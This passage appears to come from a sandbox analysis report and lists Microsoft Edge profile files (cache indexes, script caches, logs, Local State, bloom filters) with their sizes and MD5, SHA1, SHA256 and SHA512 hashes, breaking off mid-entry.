C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\ccb05845-6ed5-49aa-ae8e-c78405a17dde\index-dir\the-real-index

Filesize
72B

MD5
8d510c282a10af060bc408bd88f2f6df

SHA1
b716cbb6bf7583aaaff4bed014aaed2707c012d4

SHA256
a0b4b5ac445922ca35a3498920975fcc4bc1278000ab06f05043f3937be451be

SHA512
3404f4af29d4b9b2c82fd898985209fc458ad76671bb24bf7f487c9f055d0cef0b8e3a319774de45148162b88cf32c1887db4dea99dfec5bf50114920e3d2ef7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\ccb05845-6ed5-49aa-ae8e-c78405a17dde\index-dir\the-real-index~RFe57f2ad.TMP

Filesize
72B

MD5
e88eabff79615db035cbb1e3de4e3c02

SHA1
14abe4e6c638955af168f921522a13d4a74896eb

SHA256
1dd9c7da17bd81c16d8c1e03f89f1546c1178a6057867e5cdf72a5f2e44e4d4a

SHA512
9209048fa1119d51c441772a89ed7ad7651d199d153a588890377a0b4846194ed61098330b6047d0411826bf2619e93ba6b12b863feec580832d7fbf300b3137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

Filesize
327B

MD5
dbeba2086929cbd27b313409f27e909f

SHA1
b3e48a85b96913337c4f3fba92dfa58717170a1a

SHA256
ce0981cc1a825038bc441e8875edbd05d64c30c2df6d3f817f04b4aa7b41c7ce

SHA512
4ab3027a9f61b33a8f8d25a0ab1b1662e7180658984187d70f360e4bfeb9ef243bb932b477b706c6dd096741ce524d038b8e716ecd850557012af7b2a9d9f0da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

Filesize
322B

MD5
2e4f9de28dd986d26ea329500d54c148

SHA1
1564ebc7706cc791235d71b10cc30e8ac13e6e6b

SHA256
342760c9329d305d76a0b11d39bfdf10066a0adc2bfc7567377afa0f8644a9b6

SHA512
756e07b243772ea0273d58e03eaa317276c934a6d2e77b1bb655574f0a3065225446fdd0db4b5e5d6eb3f52d5e10c401f868977a18d8154fbec1b5b4fb545f42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

Filesize
322B

MD5
460bb48dc05376d96c7808fcce03ecb5

SHA1
2828283bffa9df7fd3b9c72f652eaf32774dba2b

SHA256
87c71423346f2392350b911f67201bc17eaa562f8969c6d5c7f52e641980d6c8

SHA512
bc1a7e73d5bdef1696c2e2ecdbb50649e34ab1bab9a80dca8117ce827bf29a0a44efc3b3c55edbf84cd3dc7b14afa43cc81e883b93aa35cf2b131347dfbb27d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\caaa9d8f-92eb-4a5c-892c-fc5bebf089c1\index-dir\the-real-index

Filesize
456B

MD5
51749e9d106fb21d23b3916950010a36

SHA1
8766f0a41cb745e133914868763f9e616b31452a

SHA256
01c7b4a581f2adacd6e871110ac1f6ea66f3c01fdbe730fab41aec680c238ea9

SHA512
bf5cfe3ad7982da487395bc38443eab957338caf19af8352e0d793c5af1a5009b5bca2fd0b6c1f30ce3f7738a16587a396cc8e38a6e68f08f2c0934605edc8f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\caaa9d8f-92eb-4a5c-892c-fc5bebf089c1\index-dir\the-real-index

Filesize
456B

MD5
d500472a7c36e9ad8324b2e43aa890b7

SHA1
de07166f3953a67de0685995c8a07974a0bbcf97

SHA256
3369e44a5d4737c2f51898705d011bf3d41d4dff9021de1db3d88dcd3b5dd506

SHA512
cef294b6add709ccd7b15c33bffd180ed9bf25a007844b6b0dd090e159c87345a33870d9504532d99bd38837f82cad055aa27f486c1eb4bcc99ec52e6e3e4146

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\caaa9d8f-92eb-4a5c-892c-fc5bebf089c1\index-dir\the-real-index~RFe5828c1.TMP

Filesize
48B

MD5
8ffcccc1918be620414f485bd16d58e4

SHA1
36eb03d7c7442b72ff20b05c8f25383b9b966e0c

SHA256
538e5c5087a68566bacbd75a240dbf361683785aa2f6bd7782e6f881059c102d

SHA512
45ac86aa0131032c659a8674c1b226dc12bd1018e0f926a48725affb0b2790df27caf54e1c6d170e0c7a7c185fd8c03434ccdffdf516d39cd5d0c450f92dc539

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\caaa9d8f-92eb-4a5c-892c-fc5bebf089c1\index-dir\the-real-index~RFe5be26d.TMP

Filesize
456B

MD5
4b4c997c22fd5a7f4cb2544a33d4b973

SHA1
7b04995b2db62bee899db0395f05f9e9d962003e

SHA256
b06528f057731cf04a3d41fb1fae0f0cb08140738a0d5f3165af9218cba64330

SHA512
cccd478a3628756b70d0e24c3b24458b4c714d633c197984617a0be6260d9e95b6c2277b9c2838b39ba259d1f3d92e953b3cfde75d8fa00bd0898041a3801a11

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\f275f93f-337f-46e3-92f1-bd21e6832a54\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\f275f93f-337f-46e3-92f1-bd21e6832a54\index-dir\the-real-index

Filesize
72B

MD5
fc96c9a0f33296acf6c3c261c302b73d

SHA1
26ca37ab0cd556e3e9765d655d99c98604ede310

SHA256
7776b140b06b592a2590339359d42a6593fb6af28787185857738ab440a4581d

SHA512
723ed0d661d2fbf47b95f7bd6b8dc6e6aebf3029433d0cae8e5daec8d7cefe3b2020881693343beb0afe43ab4e38ea57b547347643b320fca5fd38a96d316621

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\f275f93f-337f-46e3-92f1-bd21e6832a54\index-dir\the-real-index

Filesize
48B

MD5
62fda49d2120000eafe36a2ec59a1568

SHA1
f06500a3ca67d07564117c249445b80d06817c6e

SHA256
12665d769884114de0fd8aebf6a2a06c9646284c8145e3bf1dff055fa4f57999

SHA512
c11e89684b43b7ab691fef5bf5f1a145a6b0a45c60e6d9851c53eeff1262e9a9091d0d545e818d5f8713735e19a7b687ec12187b79f000547869df821f1f5d71

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\f275f93f-337f-46e3-92f1-bd21e6832a54\index-dir\the-real-index

Filesize
72B

MD5
51ee2145afb3e5825597d4111af24868

SHA1
e7b864453ac7bb636dac659fbacfb529eab108bc

SHA256
0da9499c9d93ce2adb064dd63e8d888f4a3950630a9510fee77a0d4f8a3b0e3a

SHA512
29534af3b6a4e32cc29546e694d295718983f5bd42fdd97c5464998e05e4103ac9984cc5074b8361c7f39efbd9b7ec54cbfcc1b758076bca08f40fa47badae44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\f275f93f-337f-46e3-92f1-bd21e6832a54\index-dir\the-real-index

Filesize
72B

MD5
ec12300fcfad478620a501c32e7fa7af

SHA1
11905c0b7e82b310d53896ca014f03d655ed220a

SHA256
0b8d99cc32aa3b9cdbcadba82d692df190b2495bdf79ab188df637933dadd49d

SHA512
85851f60349cea76a9ec60b909a2e96e8cafc091c0457f23ddeacfb7e831cb63047ed497b7591df4efa8a4fc343fca92fc63f97e8ba5509e4b4d6fdb037a61b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\f275f93f-337f-46e3-92f1-bd21e6832a54\index-dir\the-real-index~RFe5be319.TMP

Filesize
72B

MD5
652042aa77403386bc83bfadd5483844

SHA1
54501b30f11c9e3e0ce15f780f2d5d42e70f3114

SHA256
cf271d90e22e198159303e104a29a4cc61091df3baa7f9c0d9b97ad4b5505f48

SHA512
c296bce8c215474c83be0cef6f567708eb42b4b57c506d7e7fe8657844e0af7aa022edcad76b8687578533dde6669fd9b9b2b67c6a502f1d5a198c6ba13e5039

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\index.txt

Filesize
193B

MD5
c8cd9cc02d8e18cc3bfeb59baeb1cefe

SHA1
1c21b0687f1b67cee72339cc4fa27063931df56c

SHA256
4cec7341ffa0e3f0757b1cffb19c7aae08ee0dc5b3f9eb9f2549243121d16d2b

SHA512
69de5413e16a10388fa6abbccbc8766d13e2127fcac0c5a2669250585f19f50f46dcd56d796f7b61a3c072d25079f7fbec5113c42f7443f576fcfc6cbc9b77a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\index.txt

Filesize
197B

MD5
7090209c78d932b6a1552d54c87ed749

SHA1
066283fff1ba638629b4bb7a4a09d967458b9343

SHA256
a3bdd727fd967d933c20fa065d170eaf5e6750d19239a7c83b1daa0a8bd40f43

SHA512
24cf3ceba42f8ba7d628cec5ed017a31b2bf4c4a316e679d1baf6c06dde20f7fee0de7b584e8a69675685e20b8f00048cac0960faa67de752d9d2e2e76fbba72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\index.txt

Filesize
193B

MD5
d7a6f96330348941d6aeb52d294f0bd1

SHA1
30045fb3fd3beda60e29d1b42138d028681f7ff0

SHA256
6243c54c5bbe5b86f0d9f2e6dce65fc17f09d9d8b981d26d5e287d01fbed60cb

SHA512
1337c5b6b5f4771ecebfce192f0563857c4930fad5031f781422a83e98b826ff739b12a4b78c75cb4f36284e6b41bb8881601f2bb6a08ab75cd670302b1441f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\index.txt

Filesize
193B

MD5
28b21bd45e50fed25580517eec2be518

SHA1
d74d494dd71be0eb43b49deaf458511a6e23f138

SHA256
ed9409834aa38102122f863b630c8c3e58e8cbfefb0378b8aae5efc8c126ad76

SHA512
ef5389c022b9bffb2bfb557a03f41c9478d856997bb37274a34676c3d6622af639c3f4726bb4f244126f2aae44f207b1ad70ecbf9e9c19e0b9973103db57ff29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\index.txt~RFe57d8eb.TMP

Filesize
131B

MD5
2eaa006a2072b70d482f25bd0edc9f04

SHA1
2e6c557fdf264bae1353133491647cb67d47c677

SHA256
2561668a44809d789cdd33c1ef68fec6d75817354f38015576f5300939f9ed11

SHA512
cdc2b27508b140e879ffa07af88f8a228a2342e830b65ec61a7fe0dd20f1f00c697cd5f4fe75141f4d70e7b2306337f6c390bc151cd5862edcadd709455dd165

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\013888a1cda32b90_0

Filesize
6KB

MD5
59e0822f81b58e3c5751a9d17ab46e32

SHA1
22b3d90f7fd150fec21c4acec6c073ec949c0119

SHA256
d834139bd743e23b7967d54227c5630ee042f4c5ee79add37da4156089f0068d

SHA512
d219e4d988e0ac4cc5f77a3c3639a3bace2552ed58e5f111620461555c119fd62ec1a95650de132449f4047c491dd7887e9a8ea8ed21cdf56475336887764135

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\297ecea5cebb5dfe_0

Filesize
5KB

MD5
f08b8d3019cf36fcccacfd52044ce8d2

SHA1
b7e5266e3c8a272771afedc2096a2010e81a54d9

SHA256
b542c43e245948c51b300fd6982e6ec7c661b304f7193e856d3b21ce34ca7e16

SHA512
66730016b1a22f251770342683f6d415db73fc6bb50e48d1074734cbfd1a2b4637d25c83363ad86e889b4445abf25ef46f061d1064b0124c6a0063aad2df4541

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2a0afd649b00527b_0

Filesize
3KB

MD5
a2324f66018db9ed9ddc412476e391f4

SHA1
e802e33dc962161aafc6be7ab16c644cc516c941

SHA256
2e2e03ef6e88198f86b5130194b99807afacf670548cc1a213850d75002f3a59

SHA512
37d043a55f5e52bb3795942b3a81860be9aab68d8877c3175289ae25d8643a4337d0455276eccfdac91c822d1b6f31f2055c998153c0e5aa04f6cb78ff515926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\67a473248953641b_0

Filesize
7KB

MD5
47c187538d4f4b0f892b5f999a000bad

SHA1
972e055e60bc10f46e1d34843f96c969e8740d43

SHA256
3e445ac91971944f6b35137b2141bbd338ee9997286ee76e53227766e10fe32d

SHA512
d3eeb8c0405b3924087fe7750417bbf9f1603c2c064d3f57256d1459a0a3cc1ecd8633b6c989ca960fcdfec6940de88ac4478a469c041b564caea3c96214878a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\7b4fd8111178d5b1_0

Filesize
5KB

MD5
337b6e0bf64e1ac1060beb14f49e5429

SHA1
2479287966b0d7b2bd161b6d1617806a4681aa71

SHA256
e2143c669995b57f91db8cf5bb95dae39e06824afbe818aa228a2074effa7905

SHA512
dc4b13fab80e1f9d0de8ebeb7fe40e1e0e884227c9767c41a86e3ef79ce03cf7363824eaeee066112bbe3dbbfb59b9bb4eae5e8c86a512ef7d2fc5b5d08b3926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\b6c28cea6ed9dfc1_0

Filesize
2KB

MD5
964500f95bc535edb6a2c4c489959690

SHA1
a98b9e53b86d09edff718bb8999e87719ca19665

SHA256
5016476d0ee1918e7f817c95c1c1bd5f2eecb9b6e1e7bcdbd807d4258a5607bb

SHA512
433d8d147aeda78a4c998970a9cc1093a79da4f56dae4834054584ef8098eb6c6f422b51c5183a44db07f9f2719ebc0855e5b7a3c62cefa015bfc6d068c319a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\d0757ff92c7cde0a_0

Filesize
4KB

MD5
09892fd8e73d5d368b341e418155c7a1

SHA1
76b5b29c25e629afcf93ae369dc94b4b1449c46e

SHA256
838a3b75275370bd9dd997ad38cae0290d03cf4307f61d2d77d17d8424ed498c

SHA512
7f89fe9e0c232ba97fed1a993c190bd913599da4bccc86f9a2b6c8b560076ed74d74da36f36155594526bf105fa4fb06500fe086e4dadbf7efac0ac50866d6d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\f1cdccba37924bda_0

Filesize
115KB

MD5
7cc07846d716b74ba1c15dc53c4e2c43

SHA1
622ee8c7faa1fe6c69da1cf89ee235f74a9dd6cf

SHA256
f17b07deaf29fc2702b53cafc498b69ef0495200ad9b30781e364fa215b14f61

SHA512
af4b3e69f10e01ffdd8e801551bac0b7064336d0fc54dcdb85bdbde0eef7eec76ec7e29cea957ea773d45a5565dd268befd6cfedc00c15eb2baf17d7311bbab8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\f1cdccba37924bda_1

Filesize
202KB

MD5
e099a04aeac6cc2dcc3ca1170b3568b4

SHA1
4e3b23101f2e1123f21ac4ae467ee54ab81d0f68

SHA256
aa6cabbc7703f1702ed5c1c5df11e70bd8225b38c7157d6615814ee758c3a0e6

SHA512
eb7bc80b53b503bed431d56b810a8ae2a08404e8d239010d60112a6d69ade52d17eff379cf4b6232fcc479383949ca351470e1a463d111de34154221f570314d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\fa813c9ad67834ac_0

Filesize
15KB

MD5
e77db1f17b39b693f699a6ab12d42f5c

SHA1
b2a42bfc0201677daef03435187d7a10b2818887

SHA256
cda0380683e536f8d057eb801c294549b3bd5e202339e49555787ecbb0e579e8

SHA512
695ab699f22e25e37f259cf249a12d07ba6612849c012163574ae12126910fe6efb288b3228ec5a5ac194603ddf7cd27cf0ace8eb89ff4b42cc9223835ace9f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
288B

MD5
466fe52107081819b4cfdde083f3688c

SHA1
30cdbf70dc7880ccfb48fdb9a9adec5e8608b21d

SHA256
06b24c7f6b1e80cef7e0130e12d6b0944c8a80f5ca8529ef5880ba5b992e56b6

SHA512
8db0fa243f33ec4e7abe08df94985633fd033a7301c7843fe396b221d8a9f4b5dde9d3883ee35e6ce5f9a502e3b347d2eef3c4c9f1dad2b95c89db09e83d8acd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5826ec.TMP

Filesize
72B

MD5
61445eda6759aba1849aa2e4d09b0d6c

SHA1
9a9638fc390928ae556306a462d0b0aca483ecca

SHA256
33f53a103e04027f76b56dfc3d75569ee7edfd33d93ff25a5a6c7ff0ddc17e8c

SHA512
fed59a6c938b2d3befd5457d4d6f63483a0e61a861ec02c551a7506bb4fb2df9f9ce9116be41ae8a9c3a96b04244fd911ad5610562cf0d0c34b944ea1435c62e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

Filesize
22KB

MD5
9fc67b6b78eb333e4177a77aaa2b93f8

SHA1
39e235d1f64c010071b2e6d51faa93b5caedf547

SHA256
e7e5d3ae3fdcb0bf7579f701e5b809ff33ecfd04462bd6a05d87daaabb51b672

SHA512
17d3d240a92af3acd9cdd9065f7628e7dd602a0eccb4d385de52a599c264f990e672555cc455449ee5485836ccd0b66f5add3b7ce5a2abb9e8314e39c05f9e47

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
465B

MD5
0966a0c95099b691926062605512fbcf

SHA1
c0433566dcf1e26773912942fb58380d419da69a

SHA256
7888ab27e927a7f40c69991ff4f8c7e8580cc9e1cfdf0dca7838539ba361b612

SHA512
3215760b0c8f790e890d87cac0407b0d3fbfea5bb01ef1c40b1713fda0a99074ba69482691e0dbcfc0b221d6e3692f3fc0ed4eb2eda49936c9a887cffa92fb06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
18KB

MD5
863c40576935b4b5c9e844649b865e98

SHA1
d48550abd9db0225d2f375d152b1229b49571d8c

SHA256
533359e59a4e6e3a79155e9e918195261733db2cd4dc95ec13e954211effa978

SHA512
b08bbaef4be258abf5907fb7b4b2c1f0534c2ad5b55c958fad23dd9b912b3bf8da3b8dd3e263d73c7e22f847db9c39882e2b902aa67d46cfb29553b5de44305c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
896B

MD5
aa0c3a2b644f7a346b2bbe69c9a5a0d2

SHA1
8af111e76c9cbb49d0e79a5e050b89d357a6d42f

SHA256
919986d3aed358df13b041727c68d8cec1b7b349041a7e5af8f1eacf52a21a47

SHA512
dfbe9cf1871ae6c7122351c66d09be1cbdd4459ce39bca94d031bc683392205256c5b3f2e588c3cc5235606a6d78ff04276e4b050cc676da3a3190dcd9f36d50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig

Filesize
19KB

MD5
41c1930548d8b99ff1dbb64ba7fecb3d

SHA1
d8acfeaf7c74e2b289be37687f886f50c01d4f2f

SHA256
16cee17a989167242dd7ee2755721e357dd23bcfcb61f5789cc19deafe7ca502

SHA512
a684d61324c71ac15f3a907788ab2150f61e7e2b2bf13ca08c14e9822b22336d0d45d9ff2a2a145aa7321d28d6b71408f9515131f8a1bd9f4927b105e6471b75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
41KB

MD5
4c85cd552e6410333685e07c5ae33e99

SHA1
b890055d5e80b40ed51211c97da90a9f222b7be3

SHA256
b3d9b583e3eeaff1637530fcb1ceeeef16d165b29c91218ce680804aac15f21e

SHA512
0cbbe1917a4f398a4161d4533828e34b2561e0165081f4e2b9afc4734b089f117d4038a3c0479d380b3ebde173fa1c2d152dc65cefbef02525efdf903e0d4d9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
55KB

MD5
cc0f7660868aa4f73647094fac93d11f

SHA1
137676d6d4704ed749552eaf66a07b2d31bc05a5

SHA256
33371c81e079b6c891b216683f27f27c6bf31d480568054b89e9400421ee3352

SHA512
863090dbd76fa9113493a6d4a2450a617f55d36c9d8840234002f727e3603b687c9516b079341ed1ba53953a24bb67742bc56200e571a01edaf1837ec1f94f14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
41KB

MD5
13ce8a8741d9e8d69ebe4338708f0b10

SHA1
923d427a80200c93db449a4b7ab5508bcb84e886

SHA256
5140f8414ff2c6e3ff69d241df62b49b715199eb2ba1103378be3782978623f9

SHA512
d10a184956e758398cb499f0e1d98cd2dd9ae180421ba94391b31fa87ba96210b19bc83226fe62c6fed1bc95f2a587b03fdfeefded83a31a34bf2a405cd6098f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
50KB

MD5
c2c9a7388cff5e2409ff2aa75631fc4a

SHA1
cf60428e6e51d1ed27bb9bad11ed78bc5c919d00

SHA256
96b05d17235a547fc1b1db00a55a57f82c866ff3db37a62c21a013e59e2efc32

SHA512
217a58118873505630378c33af370748c042d35d3e54f7b91ccc1efd08f688e6c747d191ef23aa5e9ba53da981a948d2ed98f916cf2fae726ca34bf1d5e8adf1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
56KB

MD5
d2885fabc617b52b3bd9f4d3d471fe0a

SHA1
53adcf10fca8a7cb582db700625feb46dddb2891

SHA256
a015c9f38c93e7a53d084c70fef80601c11fc56b05d9f96cb218cfb27409f972

SHA512
45bb33a32549c7e0bab2fff8a7710343a25f1fd5953fb94a52e9008b9912cffae2dfc4ae92c3d6b4fed23e6955705721483e4dfc70a9dc420bf541b7b67b70c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
9ead47e90004f56f9602a444d9b896a1

SHA1
57a1aaefc65152cd4fb1d4b1e7ba96c44ab25d83

SHA256
9ad399db30d08f9a1ccc8187663a6d8915da1fa97cb252396c4cd396bdfaadde

SHA512
6826a7aaf7465cb867b6c60213b02fc43bc4018b7dae27eb56177d81afc20a40a5f2509537b9f79907ee34d493e04c7646e4310a16b5266b98a42d3ae78f1633

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
cf79a25971412a0561f82e446fdda981

SHA1
6d3fb4e86d140377f2789a4abd05d28c85ed8f2c

SHA256
c893d3fb74cc02603af1d3abc16f2cb91bc7749a89d75c17b2b58348d0e1e0dc

SHA512
cbdfe6ef37c10235327042233ef623463de63347eb38c0cd6407a865e1b1262a463ef7bc6b395815a188b2e26ef5f123a082bab660efa97d1fc8407b4a20ce13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
697a442aa1831be0fdc4079ec63165a2

SHA1
a53fe184630fd2ef559a9cbbfc53fcf62b03977c

SHA256
b6fa1ef4ba0ba46112247a0be5b70b1c02da55238950c598718dbf8467a4f609

SHA512
4c369d6906fa3c2585d104c213bb03c34fd6dd7a497ad5207173fafe30421fb9974adff474dbf93b152fe660e0130c79104e33b1bc3b1a1799ef09b024423f42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
1625287abcfa9705b79d4e9741c882a8

SHA1
5d917e936c00eb82823cb256c56243eced2c2379

SHA256
88d210b7b0d2e37f4be658df8fd08c93114ec49eb49e18cee9d76b2edc367aad

SHA512
a40a17258feaf775a21334c5b23ac4dcbc8a6f7a5c91b2d90e5cf7d87e8c4002eeea27f9a52732696256774f7adb5f396950065712003065affd82379a7e3ac5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
f430c3e1bf7d8e3f3d4097f19fd8799a

SHA1
23a3fb99283557b9336c7f0a433aefd06cf8ed8c

SHA256
754dd60fb0bbaa10222de71786850e6f8a6e79dcff6e0eb7b512207a6aeddaa7

SHA512
1b72502b0af9ac790871ac54e64f848bfd761d1d0c2261230aadd4862c5b725467520358f4d3c2b89db72dc623eeecf1c15124730445e596a449293d5e3b725c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
8773add6f854ce68fddd2cc1a775500b

SHA1
ad26dc7e55345e30059131ed5de56e43e385e8c2

SHA256
ab53e3a34a63f5e5f5081d9bbc01321f2dfa3d910f7dfa76baad2ed1c2a52eca

SHA512
0bee7a55082ae71ecf9a0dd80f5219fe7393c95d4d649be9171ce3519c4f0145e77f2cd87c0cd9e1dc19c2ac84867d857e9228bc8be58a0cab212affd9333e59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
461627dca452a42361e3ed57b34a43b9

SHA1
6afe2d5251bf07cac859e049141628e293e2bbd6

SHA256
f5484e63e701e18b84521b8d7e5ae8b5c330862e2b3db35eb7afabdf9f256411

SHA512
96dff0ccee4d074cb0edd672aa27e94f4cb4915a69c1a9b94998dc5d9987986823136da122e6b73629da51de71959f55683f36861947a61b89d71ffe35d3c91b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
17694698f19fd1cb162bcdde1af4b8d6

SHA1
5ab768672e293ebe4844629f2ff00b2ba95ac6c3

SHA256
0fcabd5354361bf2229bf7a622f33f3e83ad0ee0f7de5311ecf7f0f78c0459ef

SHA512
f3eba46cf77e7f614a78bb412b50ab18878560027870389e04a7648fd65f5b1469532ad9344c4f51fc853e3adcc63c37a4ac42f542baff4c4a7d5866e8843394

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
f703eae231ae305d207f2f13e23034da

SHA1
6558332ac1d536a3ef92e87ec44ae32944b00c24

SHA256
c8f93beb80c9e7bf0fbb753ab2bda7f79497a4194817e367afce31acc876c542

SHA512
3cf3bff06501cee66b021998503cc40dcfec3b01c81d69fe2dae1f4864da15ad11a5d5832627ef5e3a9cf735eda8151de43a3be29e26d151e228cb8fac54c7fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter~RFe592968.TMP

Filesize
392B

MD5
d3908a1fb3c745b56c4025096c06f641

SHA1
787ca6ad8f1c2def440c713a9b72691abe5d9a80

SHA256
781f5630c46d2d1fe6de318e88bf7ad7bc09d3e0e5665aeb8215e7643d084d64

SHA512
be5eb6441bf71e7ac3855c964c4bace896960c047755463d3fe10c15c0c5c9254d01b5f80540adee797b0ddf973ea77dea3f7a5fd0fb7d2b720e853abd3c2686

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\10.34.0.57\Ruleset Data

Filesize
2.8MB

MD5
6a62b26b738ffda1414b1e45b3b97c12

SHA1
ff44417a79841f948bdbeec9049f9fb59d16dc9f

SHA256
da3927c997d3bb2326e97a8dd7835c28f50ad8c4a9dd407669f20730c0159207

SHA512
820caca570523600a057dbedd38b7e3b375d6427d716cb74d0aee0825e621268a9f418f135443e5bc6bd7b9a1fbb8eb6676324d46f9111e56404b8953f23de53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Well Known Domains\1.2.0.0\well_known_domains.dll

Filesize
572KB

MD5
f5f5b37fd514776f455864502c852773

SHA1
8d5ed434173fd77feb33cb6cb0fad5e2388d97c6

SHA256
